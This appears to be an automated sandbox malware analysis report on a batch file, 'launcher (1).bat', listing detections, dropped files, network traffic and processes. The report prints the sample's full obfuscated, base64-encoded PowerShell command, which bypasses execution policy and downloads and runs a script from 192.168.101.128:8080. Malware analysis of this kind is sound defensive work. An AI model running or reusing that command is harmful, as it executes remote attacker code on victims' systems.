    Security Software Discovery    		Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts3
    PowerShell    		1
    DLL Side-Loading    		1
    DLL Side-Loading    		21
    Virtualization/Sandbox Evasion    		LSASS Memory1
    Process Discovery    		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
    Process Injection    		Security Account Manager21
    Virtualization/Sandbox Evasion    		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Deobfuscate/Decode Files or Information    		NTDS1
    Application Window Discovery    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Obfuscated Files or Information    		LSA Secrets11
    System Information Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading    		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1669989 Sample: launcher (1).bat Startdate: 20/04/2025 Architecture: WINDOWS Score: 68 16 Sigma detected: Suspicious PowerShell Parameter Substring 2->16 18 Joe Sandbox ML detected suspicious sample 2->18 20 Yara detected Obfuscated Powershell 2->20 22 Sigma detected: Suspicious Encoded PowerShell Command Line 2->22 6 cmd.exe 1 2->6         started        process3 signatures4 24 Suspicious powershell command line found 6->24 26 Encrypted powershell cmdline option found 6->26 28 Bypasses PowerShell execution policy 6->28 9 powershell.exe 14 18 6->9         started        12 conhost.exe 6->12         started        process5 dnsIp6 14 192.168.101.128, 8080 unknown unknown 9->14

    Screenshots

    Download Video

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    launcher (1).bat2%VirustotalBrowse
    launcher (1).bat3%ReversingLabs
    SAMPLE100%Joe Sandbox ML

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://192.168.101.128:8080/download/powershell/0%Avira URL Cloudsafe
    http://192.168.101.128:80800%Avira URL Cloudsafe

    Domains and IPs

    Download Network PCAP: filteredfull

    Contacted Domains

    No contacted domains info
    NameSourceMaliciousAntivirus DetectionReputation
    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1507627224.00000223B5C56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1507627224.00000223B5B13000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1494598884.00000223A5CD3000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://192.168.101.128:8080/download/powershell/powershell.exe, 00000002.00000002.1494598884.00000223A7150000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1494598884.00000223A5CD3000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://go.micropowershell.exe, 00000002.00000002.1494598884.00000223A6C38000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://contoso.com/powershell.exe, 00000002.00000002.1507627224.00000223B5B13000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1507627224.00000223B5C56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1507627224.00000223B5B13000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://contoso.com/Licensepowershell.exe, 00000002.00000002.1507627224.00000223B5B13000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://contoso.com/Iconpowershell.exe, 00000002.00000002.1507627224.00000223B5B13000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://192.168.101.128:8080powershell.exe, 00000002.00000002.1494598884.00000223A7150000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://aka.ms/pscore68powershell.exe, 00000002.00000002.1494598884.00000223A5AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1494598884.00000223A5AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1494598884.00000223A5CD3000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high

                          World Map of Contacted IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious

                          Private

                          IP
                          192.168.101.128

                          General Information

                          Joe Sandbox version:42.0.0 Malachite
                          Analysis ID:1669989
                          Start date and time:2025-04-20 21:47:18 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 4m 0s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:12
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:launcher (1).bat
                          Detection:MAL
                          Classification:mal68.evad.winBAT@4/5@0/1
                          EGA Information:Failed
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 4
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Found application associated with file extension: .bat
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 184.29.183.29, 52.149.20.212
                          • Excluded domains from analysis (whitelisted): c2a9c95e369881c67228a6591cac2686.clo.footprintdns.com, ax-ring.msedge.net, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target powershell.exe, PID 8060 because it is empty
                          • Not all processes where analyzed, report is missing behavior information

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          15:48:10API Interceptor44x Sleep call for process: powershell.exe modified

                          Joe Sandbox View / Context

                          IPs

                          No context

                          Domains

                          No context

                          ASNs

                          No context

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):11608
                          Entropy (8bit):4.890472898059848
                          Encrypted:false
                          SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                          MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                          SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                          SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                          SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):64
                          Entropy (8bit):1.1940658735648508
                          Encrypted:false
                          SSDEEP:3:Nlllulbnolz:NllUc
                          MD5:F23953D4A58E404FCB67ADD0C45EB27A
                          SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                          SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                          SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:@...e................................................@..........

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ac0leksk.bvs.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y4yvzycy.afe.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          \Device\Null

                          Download File
                          Process:C:\Windows\System32\cmd.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):43
                          Entropy (8bit):4.297675800911845
                          Encrypted:false
                          SSDEEP:3:MbxJsqGCMABeSOL9y:gi9CaL0
                          MD5:44DC34D4AD9A6E4D044CB94CE40844F7
                          SHA1:2CFDDAA41DA5481618F59DEEC7907856325B384F
                          SHA-256:D0AE5FE259AF8887552EE9E33F64F045F4349B3BE5078FF0AA061355523FECFF
                          SHA-512:4BF7B47CF7D2863D75AD880E03BA642B617182F3F1FE3ACD8F96C55415C4CB62D8CB24C94D4D44ED52270E353358D6C37988E65D7BFF562386C9F5A6099AC42A
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview:No batch label specified to GOTO command...

                          Static File Info

                          General

                          File type:DOS batch file, ASCII text, with very long lines (1380)
                          Entropy (8bit):4.58933657005266
                          TrID:
                            File name:launcher (1).bat
                            File size:1'526 bytes
                            MD5:30626221f424c91a9b503a49c29f2a80
                            SHA1:ef1aaef2d0993567f67bb4473ac1e44773f9fd8f
                            SHA256:c65fe988dd48cf30fa0fb559cad98035abc06b753fe39f89c0e15d47e55142b4
                            SHA512:f46e260c65efe6e0e289d42e5958831d329a4c473a0ef64785e7c0a798b22e3d5f96f90137c0336cbef543fb2a1043e7706a1afb09d297ce9d5c026b664bdf91
                            SSDEEP:24:kjWvlw81lemtbLyl3ujdtt9cDxndjJkA/i8iHOrR9YfLEgQ8f8iGw1dsAtAxizcj:391Amt/8uDtqDx1JkOmO268Ux0uAtAx/
                            TLSH:A631AA78DAA5EDC006EB73E05ED13909602C9913C67157BCB68D0CE7A59C50A9E34AF8
                            File Content Preview:@echo off.set "_1=pow^ers^hell".set "_2=-Win^dow^Style Hidden".set "_3=-NoP -W 1 -EP Bypass -Enc".set "_4=IAAgAC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwBFACcALAAnAEkAYQBiAGwAJwAsACcAUwBFAHQALQBWAGEAUgAnACkAIAAgACgAJwBUACcAKwAnADMAUwBaAFAAMQAnACkAIAAgA

                            File Icon

                            Icon Hash:9686878b929a9886

                            Network Behavior

                            Download Network PCAP: filteredfull

                            TimestampSource PortDest PortSource IPDest IP
                            Apr 20, 2025 21:48:12.058361053 CEST496898080192.168.2.5192.168.101.128
                            Apr 20, 2025 21:48:13.046202898 CEST496898080192.168.2.5192.168.101.128
                            Apr 20, 2025 21:48:15.046458960 CEST496898080192.168.2.5192.168.101.128
                            Apr 20, 2025 21:48:19.061974049 CEST496898080192.168.2.5192.168.101.128
                            Apr 20, 2025 21:48:27.077467918 CEST496898080192.168.2.5192.168.101.128

                            Statistics

                            CPU Usage

                            050100s020406080100

                            Click to jump to process

                            Memory Usage

                            050100s0.0020406080MB

                            Click to jump to process

                            High Level Behavior Distribution

                            • File
                            • Registry

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:15:48:09
                            Start date:20/04/2025
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\launcher (1).bat" "
                            Imagebase:0x7ff747720000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true
                            Show Windows behavior

                            File Activities

                            Show Windows behavior

                            Section Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            Show Windows behavior

                            Process Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            Show Windows behavior

                            Memory Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                            General

                            Target ID:1
                            Start time:15:48:09
                            Start date:20/04/2025
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7e2000000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true
                            Show Windows behavior

                            File Activities

                            Show Windows behavior

                            Section Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            Show Windows behavior

                            Mutex Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            Show Windows behavior

                            Thread Activities

                            Show Windows behavior

                            Memory Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            Show Windows behavior

                            Windows UI Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                            General

                            Target ID:2
                            Start time:15:48:09
                            Start date:20/04/2025
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc IAAgAC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwBFACcALAAnAEkAYQBiAGwAJwAsACcAUwBFAHQALQBWAGEAUgAnACkAIAAgACgAJwBUACcAKwAnADMAUwBaAFAAMQAnACkAIAAgACgAIABbAFQAeQBwAGUAXQAoACIAewAwAH0AewAxAH0AewAyAH0AewAzAH0AewA0AH0AIgAtAGYAJwBOACcALAAnAGUAVAAnACwAJwAuAEMAUgBlAGQARQBuAHQASQBhAEwAJwAsACcAYwAnACwAJwBBAEMAaABlACcAKQAgACAAKQAgADsAIAAgACgAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAnAHQAJwAsACcAYwAnACwAJwBOAGUAdwAtAE8AYgBqAGUAJwApACAAKAAiAHsAMgB9AHsAMwB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwB0ACcALAAnAG4AJwAsACcATgBlAHQAJwAsACcALgBXAGUAYgBDAGwAaQBlACcAKQApAC4AIgBQAFIATwBgAFgAeQAiAC4AIgBjAFIAZQBEAGAAZQBOAFQAaQBgAEEAYABsAHMAIgA9ACAAIAAoACAAIAAmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAaQB0ACcALAAnAGUATQAnACkAIAAgACgAIgBWAEEAUgBJAEEAYgAiACsAIgBMACIAKwAiAEUAOgBUACIAKwAiADMAcwB6AFAAIgArACIAMQAiACkAIAApAC4AIgB2AGEATABgAFUAZQAiADoAOgAiAGQAYABFAGYAYQBVAEwAdABuAEUAdABXAE8AUgBLAGAAYwBgAFIAZQBgAEQARQBuAHQASQBhAEwAUwAiADsAJgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHIAJwAsACcAaQB3ACcAKQAoACgAIgB7ADIAfQB7ADgAfQB7ADQAfQB7ADkAfQB7ADEAfQB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQAiAC0AZgAnAG8AYQBkAC8AcABvAHcAZQByACcALAAnAC4AMQAyACcALAAnAGgAdAB0AHAAOgAvAC8AJwAsACcAOAA6ADgAMAA4ADAALwAnACwAJwAyACcALAAnAHMAaABlAGwAbAAnACwAJwAvACcALAAnAGQAbwB3AG4AbAAnACwAJwAxADkAJwAsACcALgAxADYAOAAuADEAMAAxACcAKQApAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAfAAmACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHgAJwAsACcAaQBlACcAKQA=
                            Imagebase:0x7ff7785e0000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true
                            Show Windows behavior

                            File Activities

                            Show Windows behavior

                            Section Activities

                            Show Windows behavior

                            Registry Activities

                            Powershell Activities

                            Show Windows behavior

                            Mutex Activities

                            Show Windows behavior

                            Process Activities

                            Show Windows behavior

                            Thread Activities

                            Show Windows behavior

                            Memory Activities

                            Show Windows behavior

                            System Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            Show Windows behavior

                            Windows UI Activities

                            Process Token Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                            Disassembly

                            Executed Functions

                            Memory Dump Source
                            • Source File: 00000002.00000002.1513804752.00007FF7C7F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C7F80000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff7c7f80000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9c597d34b5f69201e69446634e1b97f737c40026f7de685ac670a5c0aee9a9a5
                            • Instruction ID: 37fedd027fbb633749b07c0313edbee027991d57ab219bf5d2c2f8f6f7959aa6
                            • Opcode Fuzzy Hash: 9c597d34b5f69201e69446634e1b97f737c40026f7de685ac670a5c0aee9a9a5
                            • Instruction Fuzzy Hash: 85C13832E0DA894FE795EF6848956B9BBE1FF46320B4401BED05DD7183DE18A80783A1
                            Memory Dump Source
                            • Source File: 00000002.00000002.1513804752.00007FF7C7F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C7F80000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff7c7f80000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3cbcb7912bbfe3a2cd8a947478b2d7e04bbea94bd5aacb7c01b65e4e66b720f7
                            • Instruction ID: 2c2c7d1b20e71d9abd77bf7a619e7feec377f23b85c220001622ef3b4c0735f2
                            • Opcode Fuzzy Hash: 3cbcb7912bbfe3a2cd8a947478b2d7e04bbea94bd5aacb7c01b65e4e66b720f7
                            • Instruction Fuzzy Hash: C0911622E0DA8D5FEB95BF7958942B9BBE0FF56360B4402BED40DD3193DE18A8078351
                            Memory Dump Source
                            • Source File: 00000002.00000002.1513804752.00007FF7C7F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C7F80000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff7c7f80000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9f8825371ee28fc37961789cb3b90b3592f920e5c9c5add3e16d3d29fe62fb70
                            • Instruction ID: 35b96886ce6a0d6b1d0fc23c33f8ff6cdc3f5a8bbe9934a5bafba90bbec7b7f2
                            • Opcode Fuzzy Hash: 9f8825371ee28fc37961789cb3b90b3592f920e5c9c5add3e16d3d29fe62fb70
                            • Instruction Fuzzy Hash: D531C522E0EA865BF7A9BB3818D51B8A6D0EF563B1B9802BED00DD35D3DD0C68474311
                            Memory Dump Source
                            • Source File: 00000002.00000002.1513528100.00007FF7C7EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C7EB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff7c7eb0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                            • Instruction ID: 7c318363844ad206bb3b7ce3fb40bdce3430cf4cff51a124de02c30edd0e63ce
                            • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                            • Instruction Fuzzy Hash: 0A01A77110CB0C8FD744EF0CE491AA6B7E0FB85360F50052DE58AC3651DA36E882CB45